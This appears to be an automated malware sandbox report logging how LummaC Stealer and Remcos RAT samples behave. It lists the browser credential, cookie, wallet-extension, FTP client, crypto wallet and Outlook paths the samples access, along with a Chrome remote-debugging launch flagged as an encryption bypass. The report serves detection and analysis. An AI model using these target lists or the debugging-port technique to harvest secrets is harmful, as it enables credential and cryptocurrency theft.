Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Directory queried: number of queries: 1574

Source: Yara match	File source: 0000001E.00000003.2700117064.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2700281753.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2684584505.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2683114049.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2639955106.0000000000807000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2716445296.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2684189980.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: buildd.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 1780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-A34JIZ	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-A34JIZ
Source: C:\ProgramData\Remcos\remcos.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-A34JIZ
Source: C:\ProgramData\Remcos\remcos.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-A34JIZ

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 1780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Remcos RAT

Source: Yara match	File source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2926361931.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2625408884.0000000000988000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
